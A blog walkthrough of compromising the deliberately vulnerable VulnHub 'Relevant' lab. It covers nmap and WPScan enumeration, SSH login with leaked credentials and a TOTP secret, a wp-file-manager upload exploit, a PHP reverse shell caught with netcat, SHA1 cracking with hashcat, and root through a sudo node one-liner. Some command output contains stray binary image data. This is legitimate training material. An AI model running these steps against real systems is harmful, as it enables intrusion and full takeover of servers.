Address
304 North Cardinal St.
Dorchester Center, MA 02124

Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM

QR code

VulnHub Relevant Walkthrough – More WordPress Exploitation

The next machine that I solved was VulnHub Relevant, and it was another good one.

VulnHub Relevant Walkthrough – Introduction

If you haven’t read my last walkthrough, then I can recommend it.

This time, it’s Relevant by iamv1nc3nt, which you can download here.

VulnHub Relevant - Login prompt

YouTube Version of this Post

If you prefer video and audio over just reading the text, then you can find the YouTube version of this post below.

That said, don’t forget to hit those like and subscribe buttons to help support the blog and channel!

Enumeration

First, I did an Nmap sweep of my network to get my target’s IP address.

kali@kali:~/VulnHub/relevant$ sudo nmap -sP 192.168.5.0/24
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 19:03 EDT

...

Nmap scan report for cybersploit (192.168.5.230)
Host is up (0.00017s latency).
MAC Address: 08:00:27:15:FF:E0 (Oracle VirtualBox virtual NIC)

Next, I used Nmap again and saw that ports 22 and 80 were open on my target.

kali@kali:~/VulnHub/relevant$ sudo nmap -A 192.168.5.230
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 19:12 EDT
Nmap scan report for 192.168.5.230
Host is up (0.00028s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Database Error
MAC Address: 08:00:27:15:FF:E0 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/1%OT=22%CT=1%CU=31353%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5F76625A%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=104%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 192.168.5.230

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.53 seconds

For more web enumeration, I ran dirsearch against the host. I’m loving this tool and should have started using it instead of dirb a while ago.

kali@kali:~/VulnHub/relevant$ python3 ~/tools/dirsearch/dirsearch.py -u http://192.168.5.230 -e php,txt,cnf,conf -w /usr/share/wordlists/dirbuster/*medium*txt

_|. _ _  _  _  _ _|_    v0.3.9                                                                                   
(_||| _) (/_(_|| (_| )                                                                                            
                                                                                                                  
Extensions: php, txt, cnf, conf | HTTP method: GET | Threads: 12 | Wordlist size: 220521

Error Log: /home/kali/tools/dirsearch/logs/errors-20-10-01_19-16-53.log

Target: http://192.168.5.230                                                                                      
                                                                                                                  
Output File: /home/kali/tools/dirsearch/reports/192.168.5.230/20-10-01_19-16-53

[19:16:53] Starting:
[19:16:53] 500 -    3KB - /    
[19:16:54] 301 -  178B  - /wp-content  ->  http://192.168.5.230/wp-content/
[19:16:55] 301 -  178B  - /wp-includes  ->  http://192.168.5.230/wp-includes/
[19:17:13] 301 -  178B  - /wp-admin  ->  http://192.168.5.230/wp-admin/
                                                                                                      
Task Completed              

When I went to the home page of the web application, I saw a database connection error with a few links.

Database connection error

First, the imgbb link took me to a QR code.

QR code

When I decoded the QR code, I saw that it was a OTP auth code.

otpauth://totp/patsy@relevant?secret=BTVB3SSDD4SZYUV7DXFPBCIFKY&issuer=relevant
Message #vulnhub

Next, the Pastebin page had a list of usernames and passwords.

VulnHub Relevant - Pastebin credentials

I grabbed these credentials and put them into a local file. Once I got to the ‘patsy’ user, I received a prompt for a verification code.

kali@kali:~/VulnHub/relevant$ cat creds.txt
cardib : CardiCardiBacardi
cline : Hello^Dear^Kitten
edward : $cissor-Hands
kevin : Fish$Called-->
michael : abc123YouAndMe
patsy : Crazy%for%Falling
thriller : CuzThisIsThriller!
wanda : Franks&Beans&Mustard
willy : Wonka&TheChocolateFactory
webmaster : Google'sAllTheThings
kali@kali:~/VulnHub/relevant$ ssh [email protected]
Password:
Password:
kali@kali:~/VulnHub/relevant$ ssh [email protected]
Password:
Password:
kali@kali:~/VulnHub/relevant$ ssh [email protected]
Password:
Password:
kali@kali:~/VulnHub/relevant$ ssh [email protected]
Password:
Password:
kali@kali:~/VulnHub/relevant$ ssh [email protected]
Password:
Verification code:

Next, I installed the OTP code into my Google Authenticator, and I was able to successfully login!

kali@kali:~/VulnHub/relevant$ ssh [email protected]
Password:
Verification code:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-48-generic x86_64)

* Documentation:  https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage

  System information as of Thu 01 Oct 2020 11:21:26 PM UTC

  System load:  0.16              Processes:               113
  Usage of /:   51.4% of 8.79GB   Users logged in:         0
  Memory usage: 30%               IPv4 address for enp0s3: 192.168.5.230
  Swap usage:   0%

* Kubernetes 1.19 is out! Get it in one command with:

     sudo snap install microk8s --channel=1.19 --classic

   https://microk8s.io/ has docs and details.

0 updates can be installed immediately.
0 of these updates are security updates.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep 21 19:10:51 2020 from 192.168.86.99
This account is currently not available.
Connection to 192.168.5.230 closed.

Initial Foothold

While on the box as the ‘patsy’ user, I was unable to find any avenues for escalation, so I went back to the web vector.

WordPress readme

First, I navigated around the WordPress site, but ran into some error pages.

WordPress error page

Next, I ran WPScan and found a few potentially interesting plugins.

kali@kali:~/VulnHub/relevant$ wpscan --url http://192.168.5.230 --force
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.2
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.5.230/ [192.168.5.230]
[+] Started: Thu Oct  1 19:28:18 2020

...

[i] Plugin(s) Identified:

[+] akismet
| Location: http://192.168.5.230/wp-content/plugins/akismet/
| Latest Version: 4.1.6 (up to date)
| Last Updated: 2020-08-10T16:49:00.000Z
| Readme: http://192.168.5.230/wp-content/plugins/akismet/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
|  - http://192.168.5.230/wp-content/plugins/akismet/, status: 200
|
| Version: 4.1.6 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
|  - http://192.168.5.230/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
|  - http://192.168.5.230/wp-content/plugins/akismet/readme.txt

[+] wp-file-manager
| Location: http://192.168.5.230/wp-content/plugins/wp-file-manager/
| Last Updated: 2020-09-14T19:30:00.000Z
| Readme: http://192.168.5.230/wp-content/plugins/wp-file-manager/readme.txt
| [!] The version is out of date, the latest version is 6.9
|
| Found By: Known Locations (Aggressive Detection)
|  - http://192.168.5.230/wp-content/plugins/wp-file-manager/, status: 200
|
| Version: 6.7 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
|  - http://192.168.5.230/wp-content/plugins/wp-file-manager/readme.txt

When I visited the File Manager page, it looked like an older version of the wp-file-manager plugin.

VulnHub Relevant - File Manager

After some searching, I found a vulnerability and exploit for this plugin.

Using the elFinder exploit, I got code execution as the www-data user!

kali@kali:~/VulnHub/relevant$ python elFinder.py http://192.168.5.230
Usage: elFinder.py http://localhost
URL Shell: %s/wp-content/plugins/wp-file-manager/lib/files/x.php?cmd=<CMD>
$ id
�PNG
�-'
�IDATx��]K[��m��^Ɛ�58���ܝm�iiiVV��X�I�2g!��@xmc�����]`��VU�C��-ԧ�Q�uN�߹�"^׃Ǐ���F�����:5�^L,A��Sr�5ҼC��H�NL*���i��5Y�5�M�[*�J����ޟ�솕���v������]ц�Q2�k��"FB�>�[�'�k���-'��G��CK��-���.�P>�29a-��ܕ�������&5����@�������c9�:Ќ����J���˃���[����MIW�-���L�n-}�7^)eK|����_�x�[�...
H��\�}JW�+z�k��m=LW���-h��{1�   -)�t�\R�u��ux��������ɼ�
&�����Ϳ�wT����P�ʟ�����w��|�3������x�5p� e��~�� e���2߿y�IgR�y�]��;��g�|G+?�`����::_^|���:k�����V��Yf|���X��~����2o�քqɇ/%_�k��![=<>���@�3��{���6�   /�R�;���Pƿ������"z>ċ�#�73㋞����-'��|��wa=�_�z_��W��T��/e��s��%�3��/� ������Y��o����&�S�sc�-�ʁ���'ێF��+���{���`���B|�;��PM�Q�B�M
                                           }�s��/�׷,�|+4��H�`���|�J��sKɂo*�z'-�)z�mu$��_�H|�x��%ֆ��TrĤ����
                                                                                                          �@�X}� ���]�^z���$����d�W��n�%~m�#5��0���pzh$
                                     �B�B��
                                           �^Ɂ�B�6�n��kw�p���i�B�׼��'o�FF�����rVK�k�B���޳p/ܯG������#'B�S���5տϥ����K��m��-'y����>���������}��imssss��E��-'e���@J���n�?�-���z���<�hF/~u,��5^�6om���3ie(��-'�
�RlĪP|��t�[����Ե�s�f㨢����t��i��A/H��|#W~H��:���/�u�V#|!�>����N�:=������"��/���&�B���-���'
                                                                                       �
                                                                                        l�uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next, I looked at the wp-config file, but the DB_PASSWORD was just a red herring.

<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'root' );

/** MySQL database password */
define( 'DB_PASSWORD', 'DidYouThinkItWouldBeThatEasy?TryHarder!' );

There were a few home directories on the system, including the previously compromised patsy user.

drwxr-xr-x  5 root     root     4096 Sep 21 19:50 .
drwxr-xr-x 20 root     root     4096 Sep 21 13:57 ..
drwxr-xr-x  4 h4x0r    h4x0r    4096 Sep 21 20:16 h4x0r
drwxr-xr-x  3 patsy    patsy    4096 Oct  1 23:21 patsy
drwxr-xr-x  3 relevant relevant 4096 Sep 21 20:27 relevant

Lateral Movement

With access to the www-data and patsy users, it was time to move to a user account that could escalate to root.

drwxr-xr-x 4 h4x0r h4x0r 4096 Sep 21 20:16 .
drwxr-xr-x 5 root  root  4096 Sep 21 19:50 ..
drwxr-xr-x 2 h4x0r h4x0r 4096 Sep 21 20:15 ...
lrwxrwxrwx 1 h4x0r h4x0r    9 Sep 21 20:16 .bash_history -> /dev/null
-rw-r--r-- 1 h4x0r h4x0r  220 Sep 21 19:50 .bash_logout
-rw-r--r-- 1 h4x0r h4x0r 3771 Sep 21 19:50 .bashrc
drwxrwxr-x 3 h4x0r h4x0r 4096 Sep 21 20:06 .local
-rw-r--r-- 1 h4x0r h4x0r  807 Sep 21 19:50 .profile

First, I found a note.txt file in the h4x0r directory, which contained some sort of hashed or encoded value.

$ cat /home/h4x0r/.../note.txt
�PNG
�-'
�IDATx��]K[��m��^Ɛ�58���ܝm�iiiVV��X�I�2g!��@xmc�����]`��VU�C��-ԧ�Q�uN�߹�"^׃Ǐ���F�����:5�^L,A��Sr�5ҼC��H�NL*���i��5Y�5�M�[*�J����ޟ�솕���v������]ц�Q2�k��"FB�>�[�'�k���-'��G��CK��-���.�P>�29a-��ܕ�������&5����@�������c9�:Ќ����J���˃���[����MIW�-���L�n-}�7^)eK|����_�x�[�...
H��\�}JW�+z�k��m=LW���-h��{1�   -)�t�\R�u��ux��������ɼ�
&�����Ϳ�wT����P�ʟ�����w��|�3������x�5p� e��~�� e���2߿y�IgR�y�]��;��g�|G+?�`����::_^|���:k�����V��Yf|���X��~����2o�քqɇ/%_�k��![=<>���@�3��{���6�   /�R�;���Pƿ������"z>ċ�#�73㋞����-'��|��wa=�_�z_��W��T��/e��s��%�3��/� ������Y��o����&�S�sc�-�ʁ���'ێF��+���{���`���B|�;��PM�Q�B�M
                                           }�s��/�׷,�|+4��H�`���|�J��sKɂo*�z'-�)z�mu$��_�H|�x��%ֆ��TrĤ����
                                                                                                          �@�X}� ���]�^z���$����d�W��n�%~m�#5��0���pzh$
                                     �B�B��
                                           �^Ɂ�B�6�n��kw�p���i�B�׼��'o�FF�����rVK�k�B���޳p/ܯG������#'B�S���5տϥ����K��m��-'y����>���������}��imssss��E��-'e���@J���n�?�-���z���<�hF/~u,��5^�6om���3ie(��-'�
�RlĪP|��t�[����Ե�s�f㨢����t��i��A/H��|#W~H��:���/�u�V#|!�>����N�:=������"��/���&�B���-���'
                                                                                       �
                                                                                        l�news : 4C7EB317A4F4322C325165B4217C436D6E0FA3F1

Using hashcat, I was able to crack this SHA1 hash in just over an hour. Note: If you are creating a vulnerable machine, I recommend just picking a password from the RockYou list, to prevent unnecessary cracking time.

kali@kali:~/VulnHub/relevant$ hashcat -m 100 relevant-hash.txt -r ~/tools/password_cracking_rules/OneRuleToRuleThemAll.rule ~/tools/cracking/rockyou.txt
hashcat (v5.1.0-1397-g7f4df9eb) starting...

OpenCL API (OpenCL 1.2 (Jun 23 2019 21:50:55)) - Platform #1 [Apple]
====================================================================
* Device #1: Intel(R) Core(TM) i9-9880H CPU @ 2.30GHz, skipped
* Device #2: Intel(R) UHD Graphics 630, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 560X Compute Engine, 1024/4096 MB allocatable, 16MCU

...

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Name........: SHA1
Hash.Target......: 4c7eb317a4f4322c325165b4217c436d6e0fa3f1
Time.Started.....: Sun Oct 11 13:00:27 2020 (18 mins, 56 secs)
Time.Estimated...: Sun Oct 11 14:34:09 2020 (1 hour, 14 mins)
Guess.Base.......: File (/Users/raymond.doyle/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/raymond.doyle/tools/password_cracking_rules/OneRuleToRuleThemAll.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 22439.1 kH/s (10.18ms) @ Accel:4 Loops:32 Thr:64 Vec:1
Speed.#3.........:   105.5 MH/s (21.12ms) @ Accel:32 Loops:64 Thr:64 Vec:1
Speed.#*.........:   128.0 MH/s
Recovered........: 0/1 (0.00%) Digests
Progress.........: 171704682496/745836298075 (23.02%)
Rejected.........: 0/171704682496 (0.00%)
Restore.Point....: 3276800/14344385 (22.84%)
Restore.Sub.#2...: Salt:0 Amplifier:22752-22784 Iteration:0-32
Restore.Sub.#3...: Salt:0 Amplifier:26496-26560 Iteration:0-64
Candidates.#2....: mektechmeier -> teamoiAlekitok
Candidates.#3....: te0ia209862 -> techm2009n77

4c7eb317a4f4322c325165b4217c436d6e0fa3f1:backdoorlover
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA1
Hash.Target......: 4c7eb317a4f4322c325165b4217c436d6e0fa3f1
Time.Started.....: Sun Oct 11 13:00:27 2020 (1 hour, 8 mins)
Time.Estimated...: Sun Oct 11 14:08:34 2020 (0 secs)
Guess.Base.......: File (/Users/raymond.doyle/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/raymond.doyle/tools/password_cracking_rules/OneRuleToRuleThemAll.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 24557.0 kH/s (10.55ms) @ Accel:4 Loops:32 Thr:64 Vec:1
Speed.#3.........:   123.8 MH/s (14.49ms) @ Accel:32 Loops:64 Thr:64 Vec:1
Speed.#*.........:   148.3 MH/s
Recovered........: 1/1 (100.00%) Digests
Progress.........: 592495032320/745836298075 (79.44%)
Rejected.........: 0/592495032320 (0.00%)
Restore.Point....: 11374592/14344385 (79.30%)
Restore.Sub.#2...: Salt:0 Amplifier:8320-8352 Iteration:0-32
Restore.Sub.#3...: Salt:0 Amplifier:21376-21440 Iteration:0-64
Candidates.#2....: volcanoAugust102008 -> anonimoApRiL197630
Candidates.#3....: brat722map -> michellAugust112

Started: Sun Oct 11 13:00:26 2020
Stopped: Sun Oct 11 14:08:35 2020

Unfortunately, I was unable to login as this ‘news’ user with the current Python shell that I was using.

That said, I found another blog post and exploit.

Using this new exploit, I was able to upload a PHP reverse shell to the host.

kali@kali:~/VulnHub/relevant$ cp reverse.php payload.php
kali@kali:~/VulnHub/relevant$ python3 2020-wp-file-manager-v67.py http://192.168.5.230
Just do it... URL: http://192.168.5.230/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
200
Success!?
http://192.168.5.230/../files/payload.php

After uploading this shell, I went to the specified directory on the target.

PHP reverse shell payload

On my attacker box, I caught this connection, and had a more useful TTY!

kali@kali:~/VulnHub/relevant$ nc -lvp 4444
listening on [any] 4444 ...
192.168.5.230: inverse host lookup failed: Unknown host
connect to [192.168.5.228] from (UNKNOWN) [192.168.5.230] 40342
Linux relevant 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
23:48:39 up 30 min,  0 users,  load average: 0.00, 0.00, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

VulnHub Relevant – Privilege Escalation

First, using my new TTY, I switched to the ‘news’ user with the previously cracked password.

$ su - news
Password: backdoorlover
su: warning: cannot change directory to /var/spool/news: No such file or directory
id
uid=9(news) gid=9(news) groups=9(news)

Next, I checked my sudo privileges, and saw that I could run the /usr/bin/node command.

sudo -l -S
[sudo] password for news: backdoorlover
Matching Defaults entries for news on relevant:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User news may run the following commands on relevant:
    (ALL : ALL) /usr/bin/node

I looked at the GTFObins page, to verify that I was familiar with the node privilege escalation.

With this command, I executed node, and obtained my root shell!

sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'

id   
uid=0(root) gid=0(root) groups=0(root)

Finally, I grabbed the flag file, and finished off the target.

Flag captured

VulnHub Relevant Walkthrough – Conclusion

This was a fun box and troubleshooting the WordPress exploit was an interesting challenge.

I know that there have been a ton of VulnHub posts recently, but I am still catching up on all my stream highlights.

In the meantime, let me know if there is any other content that you’d like to see, or just come on over and watch/follow/subscribe to the Twitch channel!

To catch me live, be sure to follow me on Twitch!

One comment

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.